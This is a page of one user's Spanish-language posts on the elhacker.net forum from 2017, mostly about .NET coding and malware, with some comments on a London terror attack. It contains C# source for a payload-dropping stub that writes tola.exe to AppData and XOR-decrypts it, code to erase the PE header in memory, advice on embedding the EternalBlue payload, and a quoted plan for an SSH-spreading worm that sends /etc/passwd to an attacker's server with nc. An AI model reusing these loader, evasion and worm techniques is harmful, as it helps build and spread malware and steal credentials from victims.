elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Tema destacado: Únete al Grupo Steam elhacker.NET

Mostrar Mensajes
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ... 49
21  Foros Generales / Foro Libre / Re: Terror islamista en el corazón de Londres al grito de «Esto es por Alá» en: 5 Junio 2017, 16:38
Cría cuervos...

No, lo absurdo es que después de un atentado islamista salgan algunos a decir gilipolleces como esta, o que "mueren mas personas de hambre" o mis amigos musulmanes condenan esos actos... Sabemos a ciencia cierta porque lo hacen, entre otras cosas por que nos lo dicen...(Why we hate you & Why we fight you).

En fin, otro mas a la (ya) larga lista de atentados en lo que llevamos de año.
Si tienes razón.
22  Seguridad Informática / Hacking Básico / Re: Pruebas con EternalBlue y Doublepulsar en: 5 Junio 2017, 16:32
Bueno si wannacry pudo hacer uso de este tipo de exploit que era ya público y accesible y ya  esta el payload puesto simplemente incluyelo como recurso embebido o lo que sea y haz uso de el.
23  Programación / .NET / Re: Traducir este código a vb.net en: 5 Junio 2017, 03:48
Esta parte se me hace un poco complicada:

Código:
for (int i = 0; i < stream.Length; i++)
fileStream.WriteByte((byte)stream.ReadByte());
fileStream.Close();

Intente hacer un ejemplo basado en lo que me pasastes:
Código:
Dim stream As Stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("skip.skip.exe")
'Console.WriteLine(stream);
Using outFile As New System.IO.FileStream(appDataPath+"\tola.exe", IO.FileMode.Create, IO.FileAccess.Write)
For i = 0  To stream.length Step 1
outFile.Read((byte)stream.ReadByte())
Next
outFile.Close()
End Using

Pero me da algunos errores:
Código:
'.' expected. (BC30287) -
'Byte' is a type and cannot be used as an expression. (BC30108) -
'inFile' is not declared. It may be inaccessible due to its protection level. (BC30451) -

Por lo que supongo que en:
Código:
outfile.Read((byte)stream.ReadByte())

Varia bastante a como se hace en c#.
24  Programación / .NET / Re: Hola estoy creando un WannaCry2.0 no es para hacer el mal en: 5 Junio 2017, 02:29
Yo cree para estudiar uno en .net cualquiera duda pregunta.
25  Programación / .NET / Traducir este código a vb.net en: 5 Junio 2017, 02:29
Hola mi pregunta es sobre todo en los for se me hace complicado y en el stream. El completo código sería:
Código
  1. namespace skip
  2. {
  3.    static class Program
  4.    {
  5.        [STAThread]
  6.        static void Main()
  7.        {
  8.            Application.EnableVisualStyles();
  9.            Application.SetCompatibleTextRenderingDefault(false);
  10.            //Application.Run(new Form1());
  11.  
  12.            byte[] file =
  13.  File.ReadAllBytes(System.Reflection.Assembly.GetExecutingAssembly().Location);
  14.  
  15.            var position = PatternAt(file, Encoding.ASCII.GetBytes("BLAUMOLAMUCHO"));
  16.  
  17.            int longitudSeparador = Encoding.ASCII.GetBytes("BLAUMOLAMUCHO").Length;
  18.  
  19.            byte[] encodedBytes = new byte[file.Length - position.First()-longitudSeparador];
  20.            Array.Copy(file, position.First()+ longitudSeparador, encodedBytes, 0, file.Length - position.First()-longitudSeparador);
  21.  
  22.            //ruta del fichero embebido
  23.            string tempPath = System.IO.Path.GetTempPath();
  24.            string appDataPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
  25.            //var stream
  26.            Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("Manifest");
  27.            //Console.WriteLine(stream);
  28.            FileStream fileStream = new FileStream(appDataPath+ @"\tola.exe", FileMode.Create, FileAccess.Write);
  29.            for (int i = 0; i < stream.Length; i++)
  30.                fileStream.WriteByte((byte)stream.ReadByte());
  31.            fileStream.Close();
  32.            RunInternal(appDataPath + @"\tola.exe", "1234");
  33.         }
  34.  
  35.  
  36.  
  37.  
  38.        private static void RunInternal(string exeName, String pass)
  39.        {
  40.            //Verify the Payload exists
  41.            if (!File.Exists(exeName))
  42.                return;
  43.  
  44.            //Read the raw bytes of the file
  45.            byte[] resourcesBuffer = File.ReadAllBytes(exeName);
  46.  
  47.            byte[] decryptedBuffer = resourcesBuffer;
  48.  
  49.  
  50.  
  51.  
  52.            //If .NET executable -> Run
  53.            if (System.Text.Encoding.ASCII.GetString(decryptedBuffer).Contains("</assembly>")) //Esto devuelve false
  54.            {
  55.  
  56.            }
  57.            else
  58.            {
  59.                //Console.WriteLine(Encoding.ASCII.GetString(decryptedBuffer));
  60.               //Console.ReadKey();
  61.            }
  62.  
  63.        }
  64.  
  65.        /// <summary>
  66.        /// Decrypt the Loaded Assembly Bytes
  67.        /// </summary>
  68.        /// <param name="payload"></param>
  69.        /// <returns>Decrypted Bytes</returns>
  70.        /// algoritmo xor
  71.        private static byte[] decryptBytes(byte[] bytes, String pass)
  72.        {
  73.            byte[] XorBytes = Encoding.Unicode.GetBytes(pass);
  74.  
  75.            for (int i = 0; i < bytes.Length; i++)
  76.            {
  77.                bytes[i] ^= XorBytes[i % XorBytes.Length];
  78.            }
  79.  
  80.            return bytes;
  81.        }
  82.    }
  83. }

Por lo menos si no quereis indicarlo enterlo simplemente con los for y el streamer sería suficiente para comprender mejor las diferencias. gracias.
26  Foros Generales / Foro Libre / Re: Terror islamista en el corazón de Londres al grito de «Esto es por Alá» en: 5 Junio 2017, 02:11
No desvio el tema simplemente he dicho mi rotunda condena por lo sucedido y por todas las víctimas y muertos por manos de asesinos , por que al final estos son asesinos y la religión musulmana prohibe el asesinato y menos en nombre de alguien que lo condena, no me queda más que decir.
27  Foros Generales / Foro Libre / Re: Terror islamista en el corazón de Londres al grito de «Esto es por Alá» en: 5 Junio 2017, 00:47
Muere mas gente de hambre y no salen en las noticias, mi rotunda condena.
28  Programación / .NET / Como ocultar el formulario en vb.net en: 4 Junio 2017, 23:09
Mi pregunta es como puedo hacer para ocultar el formulario sin que apareciese, ya que al ponerlo como consola tampoco es lo que busco. Entonces mi pregunta es hay alguna manera de ocultar el formulario en caso de que no fuese necesario? He intentado con opacity,incluso con Hide:

Código:
Me.Hide()
Como podría hacer para que no sea visible.

Saludos.
29  Seguridad Informática / Análisis y Diseño de Malware / Re: Virus que se extiende por red local en: 30 Mayo 2017, 23:41
Por que no empiezas por poner un servicio tipo ssh con un usuario y password conocido. Y generas un script que:
1: haga un barrido por los ordenadores de la misma red en busca de victimas.
2: cuando encuentre una victima en la que el comando ssh nombre@IP con el password de login, copie el script en una ruta concreta de ese ordenador. Primero verifica si ya está o no. Si ya está ese arhivo pasa a la siguiente IP al paso 1.
3: Una vez copiado el archivo ejecuta el ejecutable en background y sal del ordenador.

Generas unas cuantas maquinas virtuales con una maquina linux, con sshd habilitado y el usuario y password pepe:pepe y generas un script en bash simple que haga lo que te comento.

Con eso, habrias hecho un proceso de infeccion. Ahora si quieres hacer mas cosas, pues mete en el script que busque un archivo concreto y que te lo envie a un ordenador concreto o lo pona en una web:

Por ejemplo, hacer un cat del /etc/passwd y lo pasas con un nc a un servidor que pongas en un puerto especifo a escuchar.

Es muy simple de hacer, y así te inicias en esto. Una vez hecho eso, pasas a otros sistemas, o formas de expansion como en lugar de saber la pass y el user que vaya probando solo. O que use un exploit conocido, o similares.

No se si se ha entendido.

El script digamos que haría un barrido de ip's y iría probando en cada ip para acceder por medio de ssh?
30  Programación / .NET / Re: Borrar la cabecera de un ejecutable .NET en: 28 Mayo 2017, 18:18
Basicamente es lo mismo:
Código:
[DllImport("kernel32.dll")]
private static extern IntPtr ZeroMemory(IntPtr addr, IntPtr size);

private static extern IntPtr VirtualProtect(IntPtr lpAddress, IntPtr dwSize, IntPtr flNewProtect, ref IntPtr lpflOldProtect);

public static extern IntPtr GetModuleHandle(string lpModuleName);

public static void EraseHeader()
{
IntPtr address = GetModuleHandle(null);
IntPtr dwOld = default(IntPtr);
VirtualProtect(address, (IntPtr)4096, (IntPtr)0x40, ref dwOld);
ZeroMemory(address, (IntPtr)4096);
}

Pero si cargas un formulario a tu aplicación te mostrara System.outofmemory exception.
Páginas: 1 2 [3] 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ... 49
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines